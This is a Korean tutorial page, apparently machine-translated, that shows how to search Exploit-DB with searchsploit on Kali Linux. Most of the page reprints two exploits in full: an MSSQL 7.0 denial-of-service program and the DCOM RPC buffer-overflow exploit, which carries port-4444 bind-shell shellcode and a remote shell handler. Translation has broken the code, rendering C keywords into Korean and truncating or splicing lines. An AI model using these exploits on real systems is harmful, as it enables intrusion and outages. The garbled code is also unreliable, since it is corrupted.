중화사전망 - 구한말 사전 - kali를 사용하여 웹사이트 취약점을 찾는 방법 교육

kali를 사용하여 웹사이트 취약점을 찾는 방법 교육

Searchsploit

이 기사는 www.cnhackteam.org에서 가져온 것입니다.

Searchsploit은 로컬 Exploit-db를 사용하여 소프트웨어 취약점 정보를 찾습니다.

Kali 명령줄을 열고 다음을 입력하세요.

searchsploit

시스템 도움말 보기

mssql 취약점 찾기

mssql 취약점을 찾으려면 , 명령은 다음과 같으며 mssql과 관련된 모든 취약점 정보와 관련 취약점 설명 정보를 찾습니다.

searchsploit mssql

원하는 경우 관련 취약점 설명을 보려면 mysql7.0 원격 DOS 취약점을 보려면 편집기를 사용하여 취약점 설명 뒤의 경로를 엽니다:

leafpad /usr/share/exploitdb/platforms/./windows/dos/562.c

텍스트 파일의 내용은 취약점 설명 파일과 취약점 악용 파일입니다:

/* Microsoft mssql 7.0 서버는 서비스 거부 공격에 취약합니다.

* 지정된 데이터가 있는 대형 버퍼는 공격자가 서비스를 중지할 수 있습니다.

서비스

* "mssqlserver" 발견된 오류는 서비스의

팩에 따라 다르지만 결과는 다음과 같습니다. 항상

* 동일합니다.

* 예외 코드 = c0000005

* 취약: MSSQL7.0 sp0 - sp1 - sp2 - sp3

* 이 코드는 교육용이므로 귀하의 행위에 대해 책임을 지지 않습니다.

* Greets:sm0g DEADm|x #crack.fr itmaroc 그리고 내가 잊어버린 evryone */ #include

#include

#pragma comment(lib,"ws2_32")

u_long resolv(char*);

void main(int argc, char **argv) {

WSADATA WinsockData;

SOCKET s; struct sockaddr_in vulh; =0; i<700000;i+=16)memcpy(버퍼+i,"\x10\x00\x00\x10\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc ",16 ); if (argc!=3) {

printf(" MSSQL 서비스 거부\n");

printf(" by securma Massine\n");

printf("나가세요.

il a ete cree pour test ,je ne suis en aucun cas

responsable des degats que vous pouvez en faire\n");

printf("구문: MSSQLdos < port>\n");

종료(1);

}

WSAStartup(0x101,&WinsockData);

s= 소켓(AF_INET,SOCK_STREAM,IPPROTO_TCP);

ZeroMemory(&vulh,sizeof(vulh));

vulh.sin_family=AF_INET;

vulh.sin_addr. s_addr=resolv(argv[1]);

vulh.sin_port=htons(atoi(argv[2])); if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh)) ==SOCKET_ERROR) {

printf("개인 연결이 불가능합니다...le port est engenerale 1433...\n");

exit(1); p>

}

{

send(s,buffer,sizeof(buffer),0);

printf("데이터 특사. .. \n");

}

printf("\nattendez quelques secondes et verifiez que le serverur ne

reply plus.\n");

p>

closesocket(s);

WSACleanup();

}

u_long resolv(char *host_name) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr = inet_addr(host_name)) == -1) { if (!(host_ent = gethostbyname(host_name))) {

printf ("오류 DNS : 주소 지정이 불가능합니다 %s

!!!\n",host_name);

exit(1);

}

CopyMemory ((char *)&addr.s_addr,host_ent->h_addr,host_ent->h_length);

} return addr.s_addr;

} // milw0rm.com [2004-09 -29] ​​코드 보기

Window XP와 관련된 취약점 찾기

searchsploit /xp

익스플로잇 파일 보기:

leafpad / usr/share/exploitdb/platforms/./windows/remote/66.c

/*

DCOM RPC

LSD에 의해 발견된 오버플로 - H D Moore 이 작성한 Xfocus 코드 기반 익스플로잇 - 사용법: ./dcom

? p>

? 0 Windows 2000 SP0(영어)

? 1 Windows 2000 SP1(영어)

? 2 Windows 2000 SP2(영어) /p>

? 3 Windows 2000 SP3(영어)

? 4 Windows 2000 SP4(영어)

- ?

? - ? 6 Windows XP SP1(영어)

*/ #include #include #include sys/types.h> #include #include #include #include #include #include < fcntl.h> #include unsigned char binstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0 xC0 , 0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, ,0 x10, 0x48,0x60,0x02,0x00,0x00,0x00}; 서명되지 않은 문자 요청1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 ,0x00,0x00,0xE5,0x00, 0x00, 0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24, 0x58, 0xFD, 0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x7

4,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C , 0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x 6E , 0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00, 0x 00, 0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x 00, 0x00, 0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00 ,0x00 , 0x00, 0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x0 0,0xCC ,0x CC, 0xCC,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02, 0x00,0x00, 0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4 ,0x28 ,0xCD,0x00, 0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00 , 0x00,0x00,0 x00, 0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0 x00 ,0x00,0x00,0x00, 0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x0 0, 0x00,0x00,0x00,0 x00, 0x46,0xA4,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0 x00 ,0x00,

0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0 x00 , 0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 , 0x00 , 0x00, 0x78,0X00, 0x00, 0x30,0X00, 0x00, 0x01,0X00, 0x00, 0x01,0x10, 0x08,0X00, 0xcc, 0xcc, 0x0, 0x00, 0x00, 0x00, 0x4F,0xB 6,0x88,0x20,0xFF ,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0 x00, , 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00, 0x00, 0x00, 00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,0x10, 0x08,0x00, 0xcc, 0xcc, 0xcc, 0x48,0X00, 0x07,0x66,0X00, 0x00, 0x66,0X00 0x06,0x09,0x02,0x 00,0x00,0x00,0x00 ,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x01,0x00,0x0 0,0x00 ,0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0 x00,0x00,0x00,0x70,0xD8,0x98,0x9 3, 0x98,0x4f, 0xd2,0x11,0xa9,0x3d, 0xbe, 0x57,0xb2,0x00, 0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x 08, 0x00,0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc. ,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x18, 0x43 ,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0

x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x0 3 , 0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00 ,0 x01, 0x00,0x81,0xC5,0x17,0x03,0x80,0x0E ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 x00, 0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08, 0x00, 0 XCC, 0XCC, 0XCC, 0XCC, 0x30,0x00, 0x00,0x00,0x78,0x6e, 0x00,0x00,0x00,0x00,0x00,0xd8,0xda, 0x0d, 0x00,0x00,0x00, 0x00,0X00,0X00,0X00,0X00 ,0x00, 0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0 3,0x00 ,0 x00, 0x00,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00,0x00,0x00,0x30,0x00, 0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0 xCC, 0xCC,0x68, 서명되지 않은 문자 요청 2 []={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x5C,0x00,0x5C,0x00}; ={ 0x5C,0x00,0x43, 0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x 00, 0x31,0x00,0x31,0 x00, 0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,

0x31,0x00,0x31,0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; unsigned char *targets [] =

{ "Windows 2000 SP0(영어) )", "Windows 2000 SP1(영어)", "Windows 2000 SP2(영어)", "Windows 2000 SP3(영어)", "Windows 2000 SP4(영어)", "Windows XP SP0(영어)", "Windows " ed char sc []= "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x4E\x00\x42\x00 \x46\x00 \x58\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x46\x00\x58\x00" "\xff\xff\xff\xff" /* 반송 주소 * / "\xcc \xe0\xfd\x7f" /* 기본 스레드 데이터 블록 */ "\xcc\xe0\xfd\x7f" /* 기본 스레드 데이터 블록 */ /* 포트 4444 바인드셸 */ "\x90\x90\ x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\ x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\ x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\ x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\ x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\ x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90

\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff \xff\xff\xe2\xf2" "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" "\xbf\xbb\x92 \x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6 \x81\xbf\x32\x1d\xc6" "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" "\xeb\xcd \xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c \x4c\x62\xcc\xda\x8a\x81" "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" "\xbf \x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7 \x96\x8e\xf0\x78\xda\x7a\x80" "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" " \xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84 \xd7\xd5\xed\x46\xc6\xda\x2a\x80" "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81 " "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" "\xa3\xb9\x4c\xd7\xe8\x5a\x96 \x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3" "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f \x50" "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" "\x32\x0e\xb0\xb3\x7f\x01 \x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e \x1d\xd4" "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" "\xc9\x02\xc5\x7f\xe9 \x22\x1f\x4c\xd5\xcd\x

6b\xb1\x40\x64\x98\x0b" "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" "\x3a\ xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\ xb9\x51\xde\xe2\xf0\x90\x80" "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" "\ x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\ x7b\x46\x93\x41\x70\x3f\x97\x78" "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" "\x6a\x6d\xca\xdd\xe4\xf0\x90\ x80\x2f\xa2\x04"; 서명되지 않은 문자 요청4[]={ 0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00, 0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,0x07, 0x00, 0x00,0x00,0x00,0x00,0x00,0x00 }; /* TESO 코드에서 추출됨 */ void shell (int sock) { int l; char buf[512];

fd_set? 1) {

FD_SET(0, &rfds);

FD_SET(양말, &rfds);

선택(양말 + 1, &rfds, NULL, NULL, NULL); if (FD_ISSET (0, &rfds)) {

l = 읽기 (0, buf, sizeof (buf)); if (l <= 0) { printf("\n - 연결이 닫혔습니다. 로컬 사용자에 의해\n"); 종료 (EXIT_FAILURE);

}

쓰기 (sock, buf, l);

} if (FD_ISSET (sock , &rfds)) {

l = 읽기(양말, buf,

sizeof (buf)); if (l == 0) { printf ("\n - 원격 호스트에 의해 연결이 종료되었습니다.\n"); 종료 (EXIT_FAILURE);

} else if (l < 0 ) { printf ("\n - 읽기 실패\n"); 종료 (EXIT_FAILURE);

}

쓰기 (1, buf, l);

}

}

} int main(int argc, char **argv) { int sock; unsigned int target_id; unsigned short port = 135; unsigned char buf1[0x1000]; unsigned char buf2[0x1000]; ---------------------\n"); printf("- 원격 DCOM RPC 버퍼 오버플로 악용\ n"); printf("- FlashSky 및 Benjurry의 원본 코드\n"); printf("- HDM 에 의해 재작성됨\n"); if(argc<3)

{ printf("- 사용법: %s <대상 ID> <대상 IP>\n", argv[0]) printf("- 대상:\n"); ] != NULL ; len++)

{ printf("- ? %d\t%s\n", len,targets[len]);?

} printf(" \n") ;exit(1);

} /* 네, 이겨내세요 :) */ target_id = atoi(argv[1]);

ret = offsets[ target_id]; printf("- 반환 주소 0x%.8x\n 사용", ret); memcpy(sc+36, (unsigned char *) &ret, 4);

target_ip.sin_family = AF_INET ;

target_ip.sin_addr.s_addr = inet_addr(argv[2]);

target_ip.sin_port = htons(port); if ((sock=socket(AF_INET,SOCK_STREAM,0) )) == -1)

{

perror("- 소켓") return(0);

}

if(connect(sock,(struct sockaddr *)?_ip, sizeof(target_ip)) != 0)

{

perror("- 연결") return(0) ;

}

len=sizeof(sc); memcpy(buf2,request1,sizeof(request1));

len1=sizeof(request1);

*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;?

*(unsigned long *)(request2+ 8 )=*(unsigned long *)(request2+8)+sizeof(sc)/2; memcpy(buf2+len1,request2,sizeof(request2));

len1=len1+sizeof(request2 ) ; memcpy(buf2+len1,sc,sizeof(sc));

len1=len1+sizeof(sc); memcpy(buf2+len1,request3,sizeof(request3));

len1=len1+sizeof(요청3); memcpy(buf2+len1,request4,sizeof(요청4));

len1=len1+sizeof(요청4);

* ( unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0x10)=* ( unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;?

*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+ sizeof (sc)-0xc;

*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0xb8 ) =*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0 ) +sizeof(sc)-0xc;

*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc; sock,bindstr,sizeof(bindstr),0)== -1)

{

perror("- 보내기") return(0)

;

}

len=recv(sock, buf1, 1000, 0); if (send(sock,buf2,len1,0)== -1)

{

perror("- 보내기"); return(0);

}

close(sock);

sleep(1);

target_ip.sin_family = AF_INET;

target_ip.sin_addr.s_addr = inet_addr(argv[2]);

target_ip.sin_port = htons(4444); if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)

{

perror("- 소켓"); 0);

} if(connect(sock,(struct sockaddr *)?_ip, sizeof(target_ip)) != 0)

{ printf("- 익스플로잇이 실패했습니다.\n"); return(0);

} printf("- 시스템 셸로 이동하는 중...\n\n");

shell(sock); return(0);

} // milw0rm.com [2003-07-26] 코드 보기

Apple 취약점 검색

searchsploit apple